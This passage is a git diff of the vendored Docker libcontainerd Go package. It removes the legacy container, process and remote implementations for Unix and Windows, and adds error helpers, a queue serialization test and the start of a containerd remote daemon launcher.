-// GetPidsForContainer returns a list of process IDs running in a container. -// Although implemented, this is not used in Windows. -func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { - var pids []int - clnt.lock(containerID) - defer clnt.unlock(containerID) - cont, err := clnt.getContainer(containerID) - if err != nil { - return nil, err - } - - // Add the first process - pids = append(pids, int(cont.containerCommon.systemPid)) - // And add all the exec'd processes - for _, p := range cont.processes { - pids = append(pids, int(p.processCommon.systemPid)) - } - return pids, nil -} - -// Summary returns a summary of the processes running in a container. -// This is present in Windows to support docker top. In linux, the -// engine shells out to ps to get process information. On Windows, as -// the containers could be Hyper-V containers, they would not be -// visible on the container host. However, libcontainerd does have -// that information. -func (clnt *client) Summary(containerID string) ([]Summary, error) { - - // Get the libcontainerd container object - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return nil, err - } - p, err := container.hcsContainer.ProcessList() - if err != nil { - return nil, err - } - pl := make([]Summary, len(p)) - for i := range p { - pl[i] = Summary(p[i]) - } - return pl, nil -} - -// UpdateResources updates resources for a running container. -func (clnt *client) UpdateResources(containerID string, resources Resources) error { - // Updating resource isn't supported on Windows - // but we should return nil for enabling updating container - return nil -} - -func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { - return errors.New("Windows: Containers do not support checkpoints") -} - -func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { - return errors.New("Windows: Containers do not support checkpoints") -} - -func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { - return nil, errors.New("Windows: Containers do not support checkpoints") -} - -func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { - return &ServerVersion{}, nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/container.go b/vendor/github.com/docker/docker/libcontainerd/container.go deleted file mode 100644 index b40321389a..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/container.go +++ /dev/null @@ -1,13 +0,0 @@ -package libcontainerd - -const ( - // InitFriendlyName is the name given in the lookup map of processes - // for the first process started in a container. - InitFriendlyName = "init" - configFilename = "config.json" -) - -type containerCommon struct { - process - processes map[string]*process -} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_unix.go b/vendor/github.com/docker/docker/libcontainerd/container_unix.go deleted file mode 100644 index 61bab145f2..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/container_unix.go +++ /dev/null @@ -1,250 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "encoding/json" - "io" - "io/ioutil" - "os" - "path/filepath" - "sync" - "syscall" - "time" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/ioutils" - specs "github.com/opencontainers/runtime-spec/specs-go" - "github.com/tonistiigi/fifo" - "golang.org/x/net/context" -) - -type container struct { - containerCommon - - // Platform specific fields are below here. - pauseMonitor - oom bool - runtime string - runtimeArgs []string -} - -type runtime struct { - path string - args []string -} - -// WithRuntime sets the runtime to be used for the created container -func WithRuntime(path string, args []string) CreateOption { - return runtime{path, args} -} - -func (rt runtime) Apply(p interface{}) error { - if pr, ok := p.(*container); ok { - pr.runtime = rt.path - pr.runtimeArgs = rt.args - } - return nil -} - -func (ctr *container) clean() error { - if os.Getenv("LIBCONTAINERD_NOCLEAN") == "1" { - return nil - } - if _, err := os.Lstat(ctr.dir); err != nil { - if os.IsNotExist(err) { - return nil - } - return err - } - - if err := os.RemoveAll(ctr.dir); err != nil { - return err - } - return nil -} - -// cleanProcess removes the fifos used by an additional process. -// Caller needs to lock container ID before calling this method. -func (ctr *container) cleanProcess(id string) { - if p, ok := ctr.processes[id]; ok { - for _, i := range []int{syscall.Stdin, syscall.Stdout, syscall.Stderr} { - if err := os.Remove(p.fifo(i)); err != nil && !os.IsNotExist(err) { - logrus.Warnf("libcontainerd: failed to remove %v for process %v: %v", p.fifo(i), id, err) - } - } - } - delete(ctr.processes, id) -} - -func (ctr *container) spec() (*specs.Spec, error) { - var spec specs.Spec - dt, err := ioutil.ReadFile(filepath.Join(ctr.dir, configFilename)) - if err != nil { - return nil, err - } - if err := json.Unmarshal(dt, &spec); err != nil { - return nil, err - } - return &spec, nil -} - -func (ctr *container) start(checkpoint string, checkpointDir string, attachStdio StdioCallback) (err error) { - spec, err := ctr.spec() - if err != nil { - return nil - } - - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - ready := make(chan struct{}) - - fifoCtx, cancel := context.WithCancel(context.Background()) - defer func() { - if err != nil { - cancel() - } - }() - - iopipe, err := ctr.openFifos(fifoCtx, spec.Process.Terminal) - if err != nil { - return err - } - - var stdinOnce sync.Once - - // we need to delay stdin closure after container start or else "stdin close" - // event will be rejected by containerd. - // stdin closure happens in attachStdio - stdin := iopipe.Stdin - iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { - var err error - stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed - err = stdin.Close() - go func() { - select { - case <-ready: - case <-ctx.Done(): - } - select { - case <-ready: - if err := ctr.sendCloseStdin(); err != nil { - logrus.Warnf("failed to close stdin: %+v", err) - } - default: - } - }() - }) - return err - }) - - r := &containerd.CreateContainerRequest{ - Id: ctr.containerID, - BundlePath: ctr.dir, - Stdin: ctr.fifo(syscall.Stdin), - Stdout: ctr.fifo(syscall.Stdout), - Stderr: ctr.fifo(syscall.Stderr), - Checkpoint: checkpoint, - CheckpointDir: checkpointDir, - // check to see if we are running in ramdisk to disable pivot root - NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "", - Runtime: ctr.runtime, - RuntimeArgs: ctr.runtimeArgs, - } - ctr.client.appendContainer(ctr) - - if err := attachStdio(*iopipe); err != nil { - ctr.closeFifos(iopipe) - return err - } - - resp, err := ctr.client.remote.apiClient.CreateContainer(context.Background(), r) - if err != nil { - ctr.closeFifos(iopipe) - return err - } - ctr.systemPid = systemPid(resp.Container) - close(ready) - - return ctr.client.backend.StateChanged(ctr.containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateStart, - Pid: ctr.systemPid, - }}) -} - -func (ctr *container) newProcess(friendlyName string) *process { - return &process{ - dir: ctr.dir, - processCommon: processCommon{ - containerID: ctr.containerID, - friendlyName: friendlyName, - client: ctr.client, - }, - } -} - -func (ctr *container) handleEvent(e *containerd.Event) error { - ctr.client.lock(ctr.containerID) - defer ctr.client.unlock(ctr.containerID) - switch e.Type { - case StateExit, StatePause, StateResume, StateOOM: - st := StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: e.Type, - ExitCode: e.Status, - }, - OOMKilled: e.Type == StateExit && ctr.oom, - } - if e.Type == StateOOM { - ctr.oom = true - } - if e.Type == StateExit && e.Pid != InitFriendlyName { - st.ProcessID = e.Pid - st.State = StateExitProcess - } - - // Remove process from list if we have exited - switch st.State { - case StateExit: - ctr.clean() - ctr.client.deleteContainer(e.Id) - case StateExitProcess: - ctr.cleanProcess(st.ProcessID) - } - ctr.client.q.append(e.Id, func() { - if err := ctr.client.backend.StateChanged(e.Id, st); err != nil { - logrus.Errorf("libcontainerd: backend.StateChanged(): %v", err) - } - if e.Type == StatePause || e.Type == StateResume { - ctr.pauseMonitor.handle(e.Type) - } - if e.Type == StateExit { - if en := ctr.client.getExitNotifier(e.Id); en != nil { - en.close() - } - } - }) - - default: - logrus.Debugf("libcontainerd: event unhandled: %+v", e) - } - return nil -} - -// discardFifos attempts to fully read the container fifos to unblock processes -// that may be blocked on the writer side. -func (ctr *container) discardFifos() { - ctx, _ := context.WithTimeout(context.Background(), 3*time.Second) - for _, i := range []int{syscall.Stdout, syscall.Stderr} { - f, err := fifo.OpenFifo(ctx, ctr.fifo(i), syscall.O_RDONLY|syscall.O_NONBLOCK, 0) - if err != nil { - logrus.Warnf("error opening fifo %v for discarding: %+v", f, err) - continue - } - go func() { - io.Copy(ioutil.Discard, f) - }() - } -} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_windows.go b/vendor/github.com/docker/docker/libcontainerd/container_windows.go deleted file mode 100644 index 9b1965099a..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/container_windows.go +++ /dev/null @@ -1,311 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "io" - "io/ioutil" - "strings" - "syscall" - "time" - - "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" - "github.com/opencontainers/runtime-spec/specs-go" -) - -type container struct { - containerCommon - - // Platform specific fields are below here. There are none presently on Windows. - options []CreateOption - - // The ociSpec is required, as client.Create() needs a spec, - // but can be called from the RestartManager context which does not - // otherwise have access to the Spec - ociSpec specs.Spec - - manualStopRequested bool - hcsContainer hcsshim.Container -} - -func (ctr *container) newProcess(friendlyName string) *process { - return &process{ - processCommon: processCommon{ - containerID: ctr.containerID, - friendlyName: friendlyName, - client: ctr.client, - }, - } -} - -// start starts a created container. -// Caller needs to lock container ID before calling this method. -func (ctr *container) start(attachStdio StdioCallback) error { - var err error - isServicing := false - - for _, option := range ctr.options { - if s, ok := option.(*ServicingOption); ok && s.IsServicing { - isServicing = true - } - } - - // Start the container. If this is a servicing container, this call will block - // until the container is done with the servicing execution. - logrus.Debugln("libcontainerd: starting container ", ctr.containerID) - if err = ctr.hcsContainer.Start(); err != nil { - logrus.Errorf("libcontainerd: failed to start container: %s", err) - if err := ctr.terminate(); err != nil { - logrus.Errorf("libcontainerd: failed to cleanup after a failed Start. %s", err) - } else { - logrus.Debugln("libcontainerd: cleaned up after failed Start by calling Terminate") - } - return err - } - - // Note we always tell HCS to - // create stdout as it's required regardless of '-i' or '-t' options, so that - // docker can always grab the output through logs. We also tell HCS to always - // create stdin, even if it's not used - it will be closed shortly. Stderr - // is only created if it we're not -t. - createProcessParms := &hcsshim.ProcessConfig{ - EmulateConsole: ctr.ociSpec.Process.Terminal, - WorkingDirectory: ctr.ociSpec.Process.Cwd, - CreateStdInPipe: !isServicing, - CreateStdOutPipe: !isServicing, - CreateStdErrPipe: !ctr.ociSpec.Process.Terminal && !isServicing, - } - createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height) - createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width) - - // Configure the environment for the process - createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env) - createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ") - createProcessParms.User = ctr.ociSpec.Process.User.Username - - // Start the command running in the container. - newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms) - if err != nil { - logrus.Errorf("libcontainerd: CreateProcess() failed %s", err) - if err := ctr.terminate(); err != nil { - logrus.Errorf("libcontainerd: failed to cleanup after a failed CreateProcess. %s", err) - } else { - logrus.Debugln("libcontainerd: cleaned up after failed CreateProcess by calling Terminate") - } - return err - } - - pid := newProcess.Pid() - - // Save the hcs Process and PID - ctr.process.friendlyName = InitFriendlyName - ctr.process.hcsProcess = newProcess - - // If this is a servicing container, wait on the process synchronously here and - // if it succeeds, wait for it cleanly shutdown and merge into the parent container. - if isServicing { - exitCode := ctr.waitProcessExitCode(&ctr.process) - - if exitCode != 0 { - if err := ctr.terminate(); err != nil { - logrus.Warnf("libcontainerd: terminating servicing container %s failed: %s", ctr.containerID, err) - } - return fmt.Errorf("libcontainerd: servicing container %s returned non-zero exit code %d", ctr.containerID, exitCode) - } - - return ctr.hcsContainer.WaitTimeout(time.Minute * 5) - } - - var stdout, stderr io.ReadCloser - var stdin io.WriteCloser - stdin, stdout, stderr, err = newProcess.Stdio() - if err != nil { - logrus.Errorf("libcontainerd: failed to get stdio pipes: %s", err) - if err := ctr.terminate(); err != nil { - logrus.Errorf("libcontainerd: failed to cleanup after a failed Stdio. %s", err) - } - return err - } - - iopipe := &IOPipe{Terminal: ctr.ociSpec.Process.Terminal} - - iopipe.Stdin = createStdInCloser(stdin, newProcess) - - // Convert io.ReadClosers to io.Readers - if stdout != nil { - iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) - } - if stderr != nil { - iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) - } - - // Save the PID - logrus.Debugf("libcontainerd: process started - PID %d", pid) - ctr.systemPid = uint32(pid) - - // Spin up a go routine waiting for exit to handle cleanup - go ctr.waitExit(&ctr.process, true) - - ctr.client.appendContainer(ctr) - - if err := attachStdio(*iopipe); err != nil { - // OK to return the error here, as waitExit will handle tear-down in HCS - return err - } - - // Tell the docker engine that the container has started. - si := StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateStart, - Pid: ctr.systemPid, // Not sure this is needed? Double-check monitor.go in daemon BUGBUG @jhowardmsft - }} - logrus.Debugf("libcontainerd: start() completed OK, %+v", si) - return ctr.client.backend.StateChanged(ctr.containerID, si) - -} - -// waitProcessExitCode will wait for the given process to exit and return its error code. -func (ctr *container) waitProcessExitCode(process *process) int { - // Block indefinitely for the process to exit. - err := process.hcsProcess.Wait() - if err != nil { - if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { - logrus.Warnf("libcontainerd: Wait() failed (container may have been killed): %s", err) - } - // Fall through here, do not return. This ensures we attempt to continue the - // shutdown in HCS and tell the docker engine that the process/container - // has exited to avoid a container being dropped on the floor. - } - - exitCode, err := process.hcsProcess.ExitCode() - if err != nil { - if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { - logrus.Warnf("libcontainerd: unable to get exit code from container %s", ctr.containerID) - } - // Since we got an error retrieving the exit code, make sure that the code we return - // doesn't incorrectly indicate success. - exitCode = -1 - - // Fall through here, do not return. This ensures we attempt to continue the - // shutdown in HCS and tell the docker engine that the process/container - // has exited to avoid a container being dropped on the floor. - } - - return exitCode -} - -// waitExit runs as a goroutine waiting for the process to exit. It's -// equivalent to (in the linux containerd world) where events come in for -// state change notifications from containerd. -func (ctr *container) waitExit(process *process, isFirstProcessToStart bool) error { - logrus.Debugln("libcontainerd: waitExit() on pid", process.systemPid) - - exitCode := ctr.waitProcessExitCode(process) - // Lock the container while shutting down - ctr.client.lock(ctr.containerID) - - // Assume the container has exited - si := StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateExit, - ExitCode: uint32(exitCode), - Pid: process.systemPid, - ProcessID: process.friendlyName, - }, - UpdatePending: false, - } - - // But it could have been an exec'd process which exited - if !isFirstProcessToStart { - si.State = StateExitProcess - ctr.cleanProcess(process.friendlyName) - } else { - updatePending, err := ctr.hcsContainer.HasPendingUpdates() - if err != nil { - logrus.Warnf("libcontainerd: HasPendingUpdates() failed (container may have been killed): %s", err) - } else { - si.UpdatePending = updatePending - } - - logrus.Debugf("libcontainerd: shutting down container %s", ctr.containerID) - if err := ctr.shutdown(); err != nil { - logrus.Debugf("libcontainerd: failed to shutdown container %s", ctr.containerID) - } else { - logrus.Debugf("libcontainerd: completed shutting down container %s", ctr.containerID) - } - if err := ctr.hcsContainer.Close(); err != nil { - logrus.Error(err) - } - - // Remove process from list if we have exited - if si.State == StateExit { - ctr.client.deleteContainer(ctr.containerID) - } - } - - if err := process.hcsProcess.Close(); err != nil { - logrus.Errorf("libcontainerd: hcsProcess.Close(): %v", err) - } - - // Unlock here before we call back into the daemon to update state - ctr.client.unlock(ctr.containerID) - - // Call into the backend to notify it of the state change. - logrus.Debugf("libcontainerd: waitExit() calling backend.StateChanged %+v", si) - if err := ctr.client.backend.StateChanged(ctr.containerID, si); err != nil { - logrus.Error(err) - } - - logrus.Debugf("libcontainerd: waitExit() completed OK, %+v", si) - - return nil -} - -// cleanProcess removes process from the map. -// Caller needs to lock container ID before calling this method. -func (ctr *container) cleanProcess(id string) { - delete(ctr.processes, id) -} - -// shutdown shuts down the container in HCS -// Caller needs to lock container ID before calling this method. -func (ctr *container) shutdown() error { - const shutdownTimeout = time.Minute * 5 - err := ctr.hcsContainer.Shutdown() - if hcsshim.IsPending(err) { - // Explicit timeout to avoid a (remote) possibility that shutdown hangs indefinitely. - err = ctr.hcsContainer.WaitTimeout(shutdownTimeout) - } else if hcsshim.IsAlreadyStopped(err) { - err = nil - } - - if err != nil { - logrus.Debugf("libcontainerd: error shutting down container %s %v calling terminate", ctr.containerID, err) - if err := ctr.terminate(); err != nil { - return err - } - return err - } - - return nil -} - -// terminate terminates the container in HCS -// Caller needs to lock container ID before calling this method. -func (ctr *container) terminate() error { - const terminateTimeout = time.Minute * 5 - err := ctr.hcsContainer.Terminate() - - if hcsshim.IsPending(err) { - err = ctr.hcsContainer.WaitTimeout(terminateTimeout) - } else if hcsshim.IsAlreadyStopped(err) { - err = nil - } - - if err != nil { - logrus.Debugf("libcontainerd: error terminating container %s %v", ctr.containerID, err) - return err - } - - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/errors.go b/vendor/github.com/docker/docker/libcontainerd/errors.go new file mode 100644 index 0000000000..bdc26715bc --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/errors.go @@ -0,0 +1,13 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "errors" + + "github.com/docker/docker/errdefs" +) + +func newNotFoundError(err string) error { return errdefs.NotFound(errors.New(err)) } + +func newInvalidParameterError(err string) error { return errdefs.InvalidParameter(errors.New(err)) } + +func newConflictError(err string) error { return errdefs.Conflict(errors.New(err)) } diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go deleted file mode 100644 index e126b7a550..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go +++ /dev/null @@ -1,31 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "os" - "strconv" - - "github.com/Sirupsen/logrus" - "github.com/opencontainers/runc/libcontainer/system" -) - -func setOOMScore(pid, score int) error { - oomScoreAdjPath := fmt.Sprintf("/proc/%d/oom_score_adj", pid) - f, err := os.OpenFile(oomScoreAdjPath, os.O_WRONLY, 0) - if err != nil { - return err - } - stringScore := strconv.Itoa(score) - _, err = f.WriteString(stringScore) - f.Close() - if os.IsPermission(err) { - // Setting oom_score_adj does not work in an - // unprivileged container. Ignore the error, but log - // it if we appear not to be in that situation. - if !system.RunningInUserNS() { - logrus.Debugf("Permission denied writing %q to %s", stringScore, oomScoreAdjPath) - } - return nil - } - return err -} diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go deleted file mode 100644 index 2ebe5e87cf..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go +++ /dev/null @@ -1,5 +0,0 @@ -package libcontainerd - -func setOOMScore(pid, score int) error { - return nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go deleted file mode 100644 index 4f3766d95c..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go +++ /dev/null @@ -1,42 +0,0 @@ -// +build !windows - -package libcontainerd - -import ( - "sync" -) - -// pauseMonitor is helper to get notifications from pause state changes. -type pauseMonitor struct { - sync.Mutex - waiters map[string][]chan struct{} -} - -func (m *pauseMonitor) handle(t string) { - m.Lock() - defer m.Unlock() - if m.waiters == nil { - return - } - q, ok := m.waiters[t] - if !ok { - return - } - if len(q) > 0 { - close(q[0]) - m.waiters[t] = q[1:] - } -} - -func (m *pauseMonitor) append(t string, waiter chan struct{}) { - m.Lock() - defer m.Unlock() - if m.waiters == nil { - m.waiters = make(map[string][]chan struct{}) - } - _, ok := m.waiters[t] - if !ok { - m.waiters[t] = make([]chan struct{}, 0) - } - m.waiters[t] = append(m.waiters[t], waiter) -} diff --git a/vendor/github.com/docker/docker/libcontainerd/process.go b/vendor/github.com/docker/docker/libcontainerd/process.go deleted file mode 100644 index 57562c8789..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/process.go +++ /dev/null @@ -1,18 +0,0 @@ -package libcontainerd - -// processCommon are the platform common fields as part of the process structure -// which keeps the state for the main container process, as well as any exec -// processes. -type processCommon struct { - client *client - - // containerID is the Container ID - containerID string - - // friendlyName is an identifier for the process (or `InitFriendlyName` - // for the first process) - friendlyName string - - // systemPid is the PID of the main container process - systemPid uint32 -} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_unix.go b/vendor/github.com/docker/docker/libcontainerd/process_unix.go deleted file mode 100644 index 506fca6e11..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/process_unix.go +++ /dev/null @@ -1,107 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "io" - "io/ioutil" - "os" - "path/filepath" - goruntime "runtime" - "strings" - - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/tonistiigi/fifo" - "golang.org/x/net/context" - "golang.org/x/sys/unix" -) - -var fdNames = map[int]string{ - unix.Stdin: "stdin", - unix.Stdout: "stdout", - unix.Stderr: "stderr", -} - -// process keeps the state for both main container process and exec process. -type process struct { - processCommon - - // Platform specific fields are below here. - dir string -} - -func (p *process) openFifos(ctx context.Context, terminal bool) (pipe *IOPipe, err error) { - if err := os.MkdirAll(p.dir, 0700); err != nil { - return nil, err - } - - io := &IOPipe{} - - io.Stdin, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdin), unix.O_WRONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) - if err != nil { - return nil, err - } - - defer func() { - if err != nil { - io.Stdin.Close() - } - }() - - io.Stdout, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdout), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) - if err != nil { - return nil, err - } - - defer func() { - if err != nil { - io.Stdout.Close() - } - }() - - if goruntime.GOOS == "solaris" || !terminal { - // For Solaris terminal handling is done exclusively by the runtime therefore we make no distinction - // in the processing for terminal and !terminal cases. - io.Stderr, err = fifo.OpenFifo(ctx, p.fifo(unix.Stderr), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) - if err != nil { - return nil, err - } - defer func() { - if err != nil { - io.Stderr.Close() - } - }() - } else { - io.Stderr = ioutil.NopCloser(emptyReader{}) - } - - return io, nil -} - -func (p *process) sendCloseStdin() error { - _, err := p.client.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ - Id: p.containerID, - Pid: p.friendlyName, - CloseStdin: true, - }) - if err != nil && (strings.Contains(err.Error(), "container not found") || strings.Contains(err.Error(), "process not found")) { - return nil - } - return err -} - -func (p *process) closeFifos(io *IOPipe) { - io.Stdin.Close() - io.Stdout.Close() - io.Stderr.Close() -} - -type emptyReader struct{} - -func (r emptyReader) Read(b []byte) (int, error) { - return 0, io.EOF -} - -func (p *process) fifo(index int) string { - return filepath.Join(p.dir, p.friendlyName+"-"+fdNames[index]) -} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_windows.go b/vendor/github.com/docker/docker/libcontainerd/process_windows.go index 57ecc948d0..8cdf1daca8 100644 --- a/vendor/github.com/docker/docker/libcontainerd/process_windows.go +++ b/vendor/github.com/docker/docker/libcontainerd/process_windows.go @@ -1,4 +1,4 @@ -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import ( "io" @@ -8,17 +8,6 @@ import ( "github.com/docker/docker/pkg/ioutils" ) -// process keeps the state for both main container process and exec process. -type process struct { - processCommon - - // Platform specific fields are below here. - - // commandLine is to support returning summary information for docker top - commandLine string - hcsProcess hcsshim.Process -} - type autoClosingReader struct { io.ReadCloser sync.Once @@ -26,7 +15,7 @@ type autoClosingReader struct { func (r *autoClosingReader) Read(b []byte) (n int, err error) { n, err = r.ReadCloser.Read(b) - if err == io.EOF { + if err != nil { r.Once.Do(func() { r.ReadCloser.Close() }) } return @@ -49,3 +38,7 @@ func createStdInCloser(pipe io.WriteCloser, process hcsshim.Process) io.WriteClo return nil }) } + +func (p *process) Cleanup() error { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go b/vendor/github.com/docker/docker/libcontainerd/queue.go similarity index 70% rename from vendor/github.com/docker/docker/libcontainerd/queue_unix.go rename to vendor/github.com/docker/docker/libcontainerd/queue.go index b848b9872b..207722c441 100644 --- a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go +++ b/vendor/github.com/docker/docker/libcontainerd/queue.go @@ -1,6 +1,4 @@ -// +build linux solaris - -package libcontainerd +package libcontainerd // import "github.com/docker/docker/libcontainerd" import "sync" @@ -27,5 +25,11 @@ func (q *queue) append(id string, f func()) { } f() close(done) + + q.Lock() + if q.fns[id] == done { + delete(q.fns, id) + } + q.Unlock() }() } diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_test.go b/vendor/github.com/docker/docker/libcontainerd/queue_test.go new file mode 100644 index 0000000000..e13afca89a --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/queue_test.go @@ -0,0 +1,31 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "testing" + "time" + + "gotest.tools/assert" +) + +func TestSerialization(t *testing.T) { + var ( + q queue + serialization = 1 + ) + + q.append("aaa", func() { + //simulate a long time task + time.Sleep(10 * time.Millisecond) + assert.Equal(t, serialization, 1) + serialization = 2 + }) + q.append("aaa", func() { + assert.Equal(t, serialization, 2) + serialization = 3 + }) + q.append("aaa", func() { + assert.Equal(t, serialization, 3) + serialization = 4 + }) + time.Sleep(20 * time.Millisecond) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote.go b/vendor/github.com/docker/docker/libcontainerd/remote.go deleted file mode 100644 index 9031e3ae7d..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/remote.go +++ /dev/null @@ -1,20 +0,0 @@ -package libcontainerd - -// Remote on Linux defines the accesspoint to the containerd grpc API. -// Remote on Windows is largely an unimplemented interface as there is -// no remote containerd. -type Remote interface { - // Client returns a new Client instance connected with given Backend. - Client(Backend) (Client, error) - // Cleanup stops containerd if it was started by libcontainerd. - // Note this is not used on Windows as there is no remote containerd. - Cleanup() - // UpdateOptions allows various remote options to be updated at runtime. - UpdateOptions(...RemoteOption) error -} - -// RemoteOption allows to configure parameters of remotes. -// This is unused on Windows. -type RemoteOption interface { - Apply(Remote) error -} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go new file mode 100644 index 0000000000..cd2ac1ce4d --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon.go @@ -0,0 +1,344 @@ +// +build !windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/BurntSushi/toml" + "github.com/containerd/containerd" + "github.com/containerd/containerd/services/server" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +const ( + maxConnectionRetryCount = 3 + healthCheckTimeout = 3 * time.Second + shutdownTimeout = 15 * time.Second + configFile = "containerd.toml" + binaryName = "docker-containerd" + pidFile = "docker-containerd.pid" +) + +type pluginConfigs struct { + Plugins map[string]interface{} `toml:"plugins"` +} + +type remote struct { + sync.RWMutex + server.Config + + daemonPid int + logger *logrus.Entry + + daemonWaitCh chan struct{} + clients []*client + shutdownContext context.Context + shutdownCancel context.CancelFunc + shutdown bool + + // Options + startDaemon bool + rootDir string + stateDir string + snapshotter string + pluginConfs pluginConfigs +} + +// New creates a fresh instance of libcontainerd remote. +func New(rootDir, stateDir string, options ...RemoteOption) (rem Remote, err error) { + defer func() { + if err != nil { + err = errors.Wrap(err, "Failed to connect to containerd") + } + }() + + r := &remote{ + rootDir: rootDir, + stateDir: stateDir, + Config: server.Config{ + Root: filepath.Join(rootDir, "daemon"), + State: filepath.Join(stateDir, "daemon"), + }, + pluginConfs: pluginConfigs{make(map[string]interface{})}, + daemonPid: -1, + logger: logrus.WithField("module", "libcontainerd"), + } + r.shutdownContext, r.shutdownCancel = context.WithCancel(context.Background()) + + rem = r + for _, option := range options { + if err = option.Apply(r); err != nil { + return + } + } + r.setDefaults() + + if err = system.MkdirAll(stateDir, 0700, ""); err != nil { + return + } + + if r.startDaemon { + os.Remove(r.GRPC.Address) + if err = r.startContainerd(); err != nil { + return + } + defer func() { + if err != nil { + r.Cleanup() + } + }() + } + + // This connection is just used to monitor the connection + client, err := containerd.New(r.GRPC.Address) + if err != nil { + return + } + if _, err := client.Version(context.Background()); err != nil { + system.KillProcess(r.daemonPid) + return nil, errors.Wrapf(err, "unable to get containerd version") + } + + go r.monitorConnection(client) + + return r, nil +} + +func (r *remote) NewClient(ns string, b Backend) (Client, error) { + c := &client{ + stateDir: r.stateDir, + logger: r.logger.WithField("namespace", ns), + namespace: ns, + backend: b, + containers: make(map[string]*container), + } + + rclient, err := containerd.New(r.GRPC.Address, containerd.WithDefaultNamespace(ns)) + if err != nil { + return nil, err + } + c.remote = rclient + + go c.processEventStream(r.shutdownContext) + + r.Lock() + r.clients = append(r.clients, c) + r.Unlock() + return c, nil +} + +func (r *remote) Cleanup() { + if r.daemonPid != -1 { + r.shutdownCancel() + r.stopDaemon() + } + + // cleanup some files + os.Remove(filepath.Join(r.stateDir, pidFile)) + + r.platformCleanup() +} + +func (r *remote) getContainerdPid() (int, error) { + pidFile := filepath.Join(r.stateDir, pidFile) + f, err := os.OpenFile(pidFile, os.O_RDWR, 0600) + if err != nil { + if os.IsNotExist(err) { + return -1, nil + } + return -1, err + } + defer f.Close() + + b := make([]byte, 8) + n, err := f.Read(b) + if err != nil && err != io.EOF { + return -1, err + } + + if n > 0 { + pid, err := strconv.ParseUint(string(b[:n]), 10, 64) + if err != nil { + return 